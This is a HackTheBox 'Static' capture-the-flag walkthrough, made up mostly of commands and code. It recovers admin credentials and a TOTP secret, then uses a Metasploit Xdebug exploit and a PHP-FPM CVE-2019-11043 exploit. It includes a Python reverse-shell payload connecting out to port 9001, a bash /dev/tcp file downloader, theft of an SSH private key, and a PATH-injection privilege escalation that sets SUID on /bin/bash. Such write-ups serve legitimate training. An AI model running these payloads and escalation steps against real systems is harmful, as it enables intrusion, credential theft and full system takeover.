HackTheBox – Static Walkthrough
┌──(rootkali)-[/home/kali/Downloads]
└─# nmap -A 10.10.10.246
┌──(rootkali)-[/home/kali/Downloads]
└─# gobuster dir -u http://10.10.10.246:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x .php,txt
http://10.10.10.246:8080/robots.txt
http://10.10.10.246:8080/.ftp_uploads/
http://10.10.10.246:8080/.ftp_uploads/warning.txt
┌──(rootkali)-[/home/kali/Downloads]
└─# apt-get install g++
After some Googling I found a tool that fixes the corrupted gz files.
┌──(rootkali)-[/home/kali/Downloads]
└─# git clone https://github.com/yonjar/fixgz.git
┌──(rootkali)-[/home/kali/Downloads]
└─# cd fixgz/
┌──(rootkali)-[/home/kali/Downloads/fixgz]
└─# ls -la
┌──(rootkali)-[/home/kali/Downloads/fixgz]
└─# g++ fixgz.cpp -o fixgz
┌──(rootkali)-[/home/kali/Downloads/fixgz]
└─# ls
┌──(rootkali)-[/home/kali/Downloads/fixgz]
└─# ./fixgz /home/kali/Downloads/db.sql.gz db.gz
┌──(rootkali)-[/home/kali/Downloads/fixgz]
└─# gunzip db.gz
┌──(rootkali)-[/home/kali/Downloads/fixgz]
└─# ls -la
┌──(rootkali)-[/home/kali/Downloads/fixgz]
└─# cat db
Found the username (admin), the password hash (d033e22ae348aeb5660fc2140aec35850c4da997) and a TOTP secret (orxxi4c7orxwwzlo).
┌──(rootkali)-[/home/kali/Downloads/fixgz]
└─# cat hash
┌──(rootkali)-[/home/kali/Downloads/fixgz]
└─# john hash
http://10.10.10.246:8080/vpn/login.php
username: admin
password: admin
But the good news is that we have the TOTP secret (orxxi4c7orxwwzlo).
┌──(rootkali)-[/home/kali/Downloads]
└─# curl -I http://10.10.10.246:8080
┌──(rootkali)-[/home/kali/Downloads]
└─# date -s "17 Dec 2021 06:52:44"
┌──(rootkali)-[/home/kali/Downloads]
└─# timedatectl set-time "08:20:43"
TOTP codes are derived from the clock, so with our time matched to the server's Date header the generated token is accepted and we are in.
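The date/timedatectl step above works because a TOTP code is an HMAC over the current 30-second time step, so the generator's clock must agree with the server's within its tolerance window. The following is an added example (not code from the walkthrough or the box) implementing RFC 6238 TOTP next to the server-side check, using the RFC's published test secret; the lower-case base32 secret recovered from the database can be passed in the same form.

```python
import base64
import hashlib
import hmac
import struct
import time


def hotp(secret_b32, counter, digits=6):
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter, then dynamic truncation."""
    # b32decode wants upper case and '=' padding to a multiple of 8 chars; the secret
    # stored in the database on this box is lower case, so normalise it first
    key = base64.b32decode(secret_b32.upper() + "=" * (-len(secret_b32) % 8))
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret_b32, at=None, step=30, digits=6):
    """RFC 6238 TOTP: HOTP whose counter is the number of 30 s steps since the Unix epoch.
    The code changes with the clock, which is why the walkthrough syncs Kali's time to
    the server's Date header before generating one."""
    ts = int(time.time()) if at is None else int(at)
    return hotp(secret_b32, ts // step, digits)


def verify_totp(secret_b32, code, at, window=1, step=30):
    """Server-side check: accept the current step and +/- `window` neighbouring steps.
    A clock that is off by more than `window` steps produces a code that is rejected."""
    counter = int(at) // step
    return any(hmac.compare_digest(hotp(secret_b32, counter + d), code)
               for d in range(-window, window + 1))


# Test secret from RFC 6238 Appendix B: the ASCII key "12345678901234567890" in base32
RFC_SECRET = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"

if __name__ == "__main__":
    # The same secret a few steps apart gives unrelated codes; only one is valid "now"
    first = totp(RFC_SECRET, 59)
    for t in (59, 89, 119):
        print(t, totp(RFC_SECRET, t), verify_totp(RFC_SECRET, first, t))
```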
Common name: web
Click on generate
┌──(rootkali)-[/home/kali/Downloads]
└─# ls -lrt | grep web.ovpn
┌──(rootkali)-[/home/kali/Downloads]
└─# openvpn web.ovpn
┌──(rootkali)-[/home/kali/Downloads]
└─# cat web.ovpn
┌──(rootkali)-[/home/kali/Downloads]
└─# cat /etc/hosts | grep 10.10.10.246
┌──(rootkali)-[/home/kali/Downloads]
└─# openvpn web.ovpn
Now let's go to this web IP, but it keeps loading and we can't see the web page.
In the image we see that we have two interfaces, tun0 and tun9. tun9 has the IP 172.30.0.9, while the web page we want to reach is at 172.20.0.10.
┌──(rootkali)-[/home/kali/Downloads]
└─# ifconfig
So we need to add a route so the web page is reachable through the tun9 interface.
┌──(rootkali)-[/home/kali/Downloads]
└─# ip route add 172.20.0.0/24 dev tun9
And now we can access the web page.
Let's go to info.php. It shows Xdebug is loaded, so let's check the exploit for that.
https://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/
msf6 > use exploit/unix/http/xdebug_unauth_exec
msf6 exploit(unix/http/xdebug_unauth_exec) > set PATH /vpn/login.php
msf6 exploit(unix/http/xdebug_unauth_exec) > set RHOSTS 172.20.0.10
msf6 exploit(unix/http/xdebug_unauth_exec) > set LHOST tun9
msf6 exploit(unix/http/xdebug_unauth_exec) > set LPORT 9001
msf6 exploit(unix/http/xdebug_unauth_exec) > options
Now let's run the exploit. Boom, we got the shell.
msf6 exploit(unix/http/xdebug_unauth_exec) > run
meterpreter > shell
pwd
cd /home/www-data/.ssh
ls -al
cat id_rsa
┌──(rootkali)-[/home/kali/Downloads]
└─# chmod 600 id_rsa
┌──(rootkali)-[/home/kali/Downloads]
└─# ssh -i id_rsa www-data@10.10.10.246
Let's try the custom SSH port 2222 which we saw in the nmap scan. And we got user.txt.
┌──(rootkali)-[/home/kali/Downloads]
└─# ssh -i id_rsa www-data@10.10.10.246 -p 2222
www-data@web:~$ cd /home
www-data@web:/home$ ls -lrt
www-data@web:/home$ cat user.txt
Privilege escalation
On the Support Portal we see another network with the IP 192.168.254.3.
www-data@web:/home$ ifconfig
┌──(rootkali)-[/home/kali/Downloads]
└─# ssh -L 80:192.168.254.3:80 www-data@10.10.10.246 -p2222 -i id_rsa
Now let's go to localhost (127.0.0.1) and we get the page.
There is nothing on the website, it just says batch mode: /usr/bin/ersatool...
But if we check the headers we see PHP-FPM/7.1 is running, so let's check the exploit for that.
https://github.com/theMiddleBlue/CVE-2019-11043
After reading the article I understood how to exploit this and get a reverse shell.
┌──(rootkali)-[/home/kali/Downloads]
└─# git clone https://github.com/theMiddleBlue/CVE-2019-11043.git
┌──(rootkali)-[/home/kali/Downloads]
└─# mv CVE-2019-11043/exploit.py .
┌──(rootkali)-[/home/kali/Downloads]
└─# rm -rf CVE-2019-11043/
┌──(rootkali)-[/home/kali/Downloads]
└─# ls -al | grep exploit.py
┌──(rootkali)-[/home/kali/Downloads]
└─# cat dedsec.py
CODE:
import requests
# python reverse shell back to our VPN IP, sent through the index.php?a= parameter that exploit.py left behind
payload = '/usr/bin/python3.6 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.254.2",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\''
r = requests.get("http://192.168.254.3/index.php?a="+payload)
print(r.text)
https://github.com/H74N/netcat-binaries/blob/master/nc
┌──(rootkali)-[/home/kali/Downloads]
└─# scp -P 2222 -i id_rsa nc www-data@10.10.10.246:/tmp/nc
┌──(rootkali)-[/home/kali/Downloads]
└─# scp -P 2222 -i id_rsa exploit.py www-data@10.10.10.246:/tmp/exploit.py
┌──(rootkali)-[/home/kali/Downloads]
└─# scp -P 2222 -i id_rsa dedsec.py www-data@10.10.10.246:/tmp/dedsec.py
www-data@web:~$ cd /tmp
www-data@web:/tmp$ ls -lrt
www-data@web:/tmp$ chmod +x nc
www-data@web:/tmp$ ./nc -nlvp 9001
On another terminal
www-data@web:/home$ cd /tmp
www-data@web:/tmp$ python3 exploit.py --url http://192.168.254.3/index.php
www-data@web:/tmp$ python3 dedsec.py
On listener
www-data@pki:~/html$ id
www-data@pki:~/html$ pwd
www-data@pki:~/html$ ls
Now, if you remember, we saw a file called ersatool on the web page. Let's check that file.
After checking it, I found that it is a binary which runs as root.
www-data@pki:~/html$ ls -al /usr/bin/ersatool
www-data@pki:~/html$ file /usr/bin/ersatool
And after some enumeration I found the source code of that file.
www-data@pki:~/html$ cd /usr/bin
www-data@pki:/usr/bin$ find / -name ersatool.* 2>/dev/null
www-data@pki:/usr/bin$ cat /usr/src/ersatool.c
So we have two methods for getting root:
1. using the format string vulnerability
2. PATH injection
I used PATH injection.
So let's monitor the binary's calls with pspy. The problem is how to transfer the pspy binary to that machine, because there is no curl, wget or anything else for that.
But I found a way to transfer pspy onto the machine with the help of this article: how to download a file using just bash and nothing else (no curl, wget, perl, etc.), https://unix.stackexchange.com/questions/83926/how-to-download-a-file-using-just-bash-and-nothing-else-no-curl-wget-perl-et
With the help of that bash script I will transfer the pspy binary.
https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s
┌──(rootkali)-[/home/kali/Downloads]
└─# scp -P 2222 -i id_rsa pspy64s www-data@10.10.10.246:/tmp/pspy
www-data@web:/tmp$ ls -lrt
www-data@web:/tmp$ python3 -m http.server 1337
Follow the steps again to get a second shell with dedsec.py, because we want two shells: the first for running pspy, the second for running the ersatool binary.
After everything is ready, go to the shell we got from dedsec.py and paste the whole script into the terminal:
1. go to the /tmp directory
2. create a directory www
3. paste the whole code we got from StackOverflow
4. then call the function with __curl
5. and download the file into the /tmp/www directory
www-data@pki:/usr/bin$ cd /tmp
www-data@pki:/tmp$ mkdir www
www-data@pki:/tmp$ cd www
Paste the __curl function from that answer (https://unix.stackexchange.com/questions/83926/how-to-download-a-file-using-just-bash-and-nothing-else-no-curl-wget-perl-et) into the pki shell:
www-data@pki:/tmp/www$ function __curl() {
> read proto server path <<<$(echo ${1//// })
> DOC=/${path// //}
> HOST=${server//:*}
> PORT=${server//*:}
> [[ x"${HOST}" == x"${PORT}" ]] && PORT=80
>
> exec 3<>/dev/tcp/${HOST}/$PORT
> echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
> (while read line; do
> [[ "$line" == $'\r' ]] && break
> done && cat) <&3
> exec 3>&-
> }
www-data@pki:/tmp/www$ __curl http://192.168.254.2:1337/pspy > pspy
Now, after transferring pspy, run it on the first reverse shell, and on the second shell run ersatool with the inputs below.
www-data@pki:/tmp/www$ chmod +x pspy
www-data@pki:/tmp/www$ ./pspy | tee log &
/usr/bin/ersatool
create
a
a
b
exit
I captured all the calls of the binary and found that openssl was called without its full path.
┌──(rootkali)-[/home/kali/Downloads]
└─# cat openssl
┌──(rootkali)-[/home/kali/Downloads]
└─# cat openssl | base64
www-data@pki:~/html$ cd /tmp
www-data@pki:/tmp$ mkdir pwn
www-data@pki:/tmp$ cd pwn
www-data@pki:/tmp/pwn$ echo "IyEvYmluL2Jhc2gKY2htb2QgdStzIC9iaW4vYmFzaAo=" | base64 -d > openssl
www-data@pki:/tmp/pwn$ cat openssl
www-data@pki:/tmp/pwn$ chmod 755 openssl
www-data@pki:/tmp/pwn$ ls -al
www-data@pki:/tmp/pwn$ export PATH=/tmp/pwn:$PATH
www-data@pki:/tmp/pwn$ echo $PATH
www-data@pki:/tmp/pwn$ ersatool
www-data@pki:/tmp/pwn$ ls -al /bin/bash
www-data@pki:/tmp/pwn$ /bin/bash -p